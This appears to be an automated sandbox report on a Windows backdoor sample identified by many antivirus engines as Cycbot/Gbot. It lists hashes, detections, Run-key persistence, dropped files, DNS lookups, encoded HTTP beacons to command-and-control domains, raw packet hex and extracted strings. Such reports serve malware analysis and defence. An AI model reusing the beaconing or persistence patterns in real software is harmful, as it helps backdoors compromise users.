Analysis Date2015-01-26 07:32:08
MD5434cd32a1e28fef23cc4a219fe1b3d16
SHA1bdd6534b268d4f1c7f4f1f50d7235279231cbc2c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 98178ac0d9d7f178e3a551429d661023 sha1: 75f4feb34e4fb001a434bec9e6e9f40afc474854 size: 94720
Section.rdata md5: d2342d450eca59f658a46e115cb0128b sha1: 71ea2819fc5a6089655fa11e127c78e3bd024df2 size: 1536
Section.data md5: 7c4e896491e6c7506026725f71491b6a sha1: 670992ee4fab62a7ff6ad44f25174e60470cdc69 size: 79360
Section.reloc md5: 0b1663270c69ca7f9a68b796343d372f sha1: 016f5dc25085fa57a9fa09f566fa32881433da26 size: 1024
Timestamp2005-10-10 01:50:41
PEhashfd67c5d23deeca9482fdde85292430fb23e3e1a8
IMPhash221ee8d35fd9c4450414e0b3d8f98ae0
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVno_virus
AVDr. WebBackDoor.Gbot
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TQJ
AVFortinetW32/Kryptik.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Heur.Conjar.5
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.u
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Program Files\Internet Explorer\lvvm.exe
Creates FileC:\Program Files\Internet Explorer\lvvm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSskymediaportal.com
Winsock DNS127.0.0.1
Winsock DNSfreepatentsonline.com
Winsock DNSonlinehelptoall.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\conhost.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSfreepatentsonline.com
Type: A
144.202.252.20
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSskymediaportal.com
Type: A
DNSonlinehelptoall.com
Type: A
HTTP GEThttp://freepatentsonline.com/images/pdf.jpg?v93=41&tq=gHZutDyMv5rJeCG1J8K%2B1MWCJbP4lltXIA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 144.202.252.20:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 7064662e   GET /images/pdf.
0x00000010 (00016)   6a70673f 7639333d 34312674 713d6748   jpg?v93=41&tq=gH
0x00000020 (00032)   5a757444 794d7635 724a6543 47314a38   ZutDyMv5rJeCG1J8
0x00000030 (00048)   4b253242 314d5743 4a625034 6c6c7458   K%2B1MWCJbP4lltX
0x00000040 (00064)   49412533 44253344 20485454 502f312e   IA%3D%3D HTTP/1.
0x00000050 (00080)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000060 (00096)   6c6f7365 0d0a486f 73743a20 66726565   lose..Host: free
0x00000070 (00112)   70617465 6e74736f 6e6c696e 652e636f   patentsonline.co
0x00000080 (00128)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000a0 (00160)   6c6c612f 322e300d 0a0d0a              lla/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53253246   ij%2B8yjYvEaS%2F
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....


Strings
c.7
W,.
.
;
7.
q
.
.
p.
..
Q(.
080904b0
1.0.0.1
1441
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
^^^^^^^
^^^^^^^^^
^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^>
~~~~~????
<<<<<<<<<<<
========
>>>>>>>>>
>>>>>>>>>>>
||||||
|||||||
        
           
,,,,,,,,,
,,,,,,,,,,,
::::::::::::::::::
!!!!!!
?????????????
/////////
//////]]
//&&&&
""""""""""""
((((((((((
)))))))))))))
]]]]]]
{{{{{{
}}}}}}
}}}}}}}}}}}}
@@@@@@@
*******
***********
*****************
\\\\\\
&&&&&&
&&&&&&&
&&&&&&&&&
%%%%%%%%
%%%%%%%%%
%%%%%%%%%%%%%%%%
00777777777
,0C'C^
^0g6DM
0XbZEf
0yQQ9hZ
0z`GMGjF
;;111111
11111111
/"	&~1H;
	)1.}.l
29D3o}
2hdVl:S
2sHC!z
-------3
33````111
3330000
3333333333333333RRRRRRRRRR:FFFFFF
33333333C
3333UUUUUUUUU
333oooooo
3	glwo
3zQdx#
?41IVW
44444444
	4\cd=
4o\UOBG
4U895N
-4>zFIR
|{,5[2TW
55=====
(5U=\%
5v;\PXV{
^^^^^^^^66llllHHH
?69='a
6ag#Ohi-
/`-7M(
80)$2_
888888
8888888888	
88{CCC
8^9O*g
|8VxCjL
_8wZTb
9999?????????????u
=9dt"@Ib
a4R;av
aaaa[[
aaaaaa
aaaaaaaaa
?[a_+!ao
<!a|&d
ADVAPI32.dll
AfXBZQ
aO?^nr
Aphs9J
[ Aq[BId
auhA/i
%A ?wi
}AXr2D-
b8XQ7MO
BBBBBB
BBGGGGGGGAAA
Bg:BUI
%$Bi,*
~*b]OD\Zb=Fp
bPSEiYW
B=zzk&
C^2	-_
c"5rYo
cccccc
ccccccccc
cccccc]]]VVVEE
$$$CCS6666666666
CDeq)zt,eZ
C:dGwJ
Clk~Cn
cLO.FxTm
CLrgY_t
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
/Cp|Q*Y]
CreateProcessW
CreateStdAccessibleObject
!!!!!d
d4rx6~
@.data
ddddddxxxxxx
DDDMMMM
#######DDDS
D+#F:&
dHqXy&
D`}l9)]%;
e>)30e
e9%b'&
EaJGg[vd
///ee|||
eeeeeeeee
eeeehhh
-e=E;qq
>eG\O*
e">Htk
EkF5sv 
EM >KH2g
EnumResourceNamesA
F0;"jYN
ffffff\\\\\\
fffffff
FFFFFFFFFFFFaaaaaaa
fffffffffffffffffffffffffffffff
^f~-Jrd
f+rc#&H
fWWWxxxxxxx
f%Z$Z}
G07@\WI-t y
G2-vL 
g5{D~1
gC^1p#
GetACP
GetAtomNameW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentVariableW
GetLocaleInfoW
GetModuleHandleW
GetStartupInfoW
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
gg!!!!!!!!!!!!
GGGGGG
GH,?xK
GKB[qi
	g<O[B
gsFzau
{gxeuz
gy^r}j[B
g[$zXY
{h2.dl
,h{,	8
H9GMfQ
HHHHHH
/HHHHHHH
HHHHHHHHHHHHHH
'HnCK,
}Hp''Z
i#=?/-
I2O?X.
IgyIG'
IIIIII
[[[[[IIIIIIIIIIIVVVVV
iiiSSSS
IIpL+g[ 
im@7A\w9
InstallCatalog
InterlockedCompareExchange
InterlockedExchange
IsDebuggerPresent
 I/V-4
>IwNd[
!(`;j/
-j3l98
J72D^k
|j?9#+U
^j#d.0ge
j|:D;9
JF9pw!?
JM@Vgr	
j<O329
=j|,\uH}z<
k1pP7'r
:k2FN'
&{k"bK
KERNEL32.dll
k!kDQh
kkkkkk
@kqC=}
KVQ=r 
K{XcF3/
^_l|_#
l|7KH0
>l*8.j'
/Le<EJ
L/?^Hb
LLLLLL
lllllll<<<
LLLLLLLL
LLLLLLLLL
LLLLLLLLLL
LocalAlloc
LresultFromObject
lstrlenA
lstrlenW
l,Y|18
LYcE)f
L-Zv1B
m2{z=<
m:3;u]
M;>7U%>
mciSendCommandA
mFDv	/
MF[Wr4
mmm++++++++++++
mmmm((DDDDDDDDDDDDDDD!!!!!
MMMMMMMM
MMMMMMMMMMM
m/Nzq3"
m/oKh#
m;_oY/
mTloqm\
MultiByteToWideChar
 n0LiU
/:|N1QXKg:
n5#Qk4S;
NaLV8w
N+;{Ci
Nc$*VWj
NjM&\O5
nLuX:R
+NmN<Iu
nneizMT
"""""""nnncccc
NNNNNNNNNNN
NNNNNNNNNNNNNN
NNNNNZZZ
nOW@}srt
<nPOSqK
NT83vA
n$tqW\a-
;nXQ>+
?<nX|w
:N]_yer
oG!IB~6
og)PF%i
oI<;5!
OLEACC
ooooo^^<<<
OOOOOOOO
OvK-{uH
o[:]wsN=R
PathAddBackslashA
po;el&
%%PPPPPK
ppppppp
pppppppp
pq-:ia\
pRd98T
?p]T3%@6
q|3mDbqPV
QA+ZWAQ
Q)D.@L
)QJ'^[
qP]{VE
@@@@@@QQ
Qq0dDrnw
qqqqqqqqqqqq
QR;yB/
QueryMemoryResourceNotification
QueryPerformanceCounter
QvF= s
)r49AJ
|"R?9[
RaiseException
Rb4IX`|
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
RRRRRRRR
$$$$$$rrrrrrrrFFFFF
RRRRRRRRR----------
RRRRRRRRRRRRRRR
rTlw.4H
\\]s\$
s0c/|UD #+o
=s4}pK 
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SHLWAPI.dll
SI=F]W
Sj:'q|
;SklBw
^Sl3"P
sndPlaySoundA
SSS<<<<
.sssss
{{{ssssss__
""ssssssss
SSSSSSSSS
SSSSSSSSSSSDDD
SSSSSSSSSSSSSSSSSSSSSSS
_SU 5yv
-?]Swh&
=_];[t[
t028c0
T5H,#TW|
TerminateProcess
!This program cannot be run in DOS mode.
#tMaY1
tQS7'o
tTR(zgVj
TTT44444444
TTTTTTTTTTT
t"W)h=
/u7y?k
-}ua+T]
u#@$~BrYA
uD\3$Z
`uDs	rL@+
UH|NOJ3
--Uj'j
UnhandledExceptionFilter
>uo^yy
uuuuuu
UUUUUU
UUUUUUUU
V7	Aq3H
V(	8^[IA
V8<U}@
V<g$6W
V]n$-^
vQ1Bszz=>
VVVVVVVVV
VVVVVVVVVVV
VXuP{B&
v#!{_Y
W9Y@ab
+w')Cc
w//<i{+!
WideCharToMultiByte
WINMM.dll
WP*j8u
wQ]mD-
WR8gT% 
ww+++++
^^^WWW
wwwwwgg
WWWWWWWW
-}'`WZ/
;X2y?&
{x 8L;E
Xa.H^/&
)-Xft;
xIU2"cq
XKgSTU$
X<QueF
xxC2o=u
XXXXXXXXX
x/:|y`
^yfF/;u
y%tiT*
YYYYYYYY
YYYYYYYYYYYYYYYYYY
YYYYYYYYYYYYYYYYYYYYYY>>>>>>>>>>>>
z.0r9{
z+1yK)
Z4n/SBO^	
z/c@>>
zCb6%V0
zNw@2H
%%%%ZZZZZZTTh
zzzzzzzz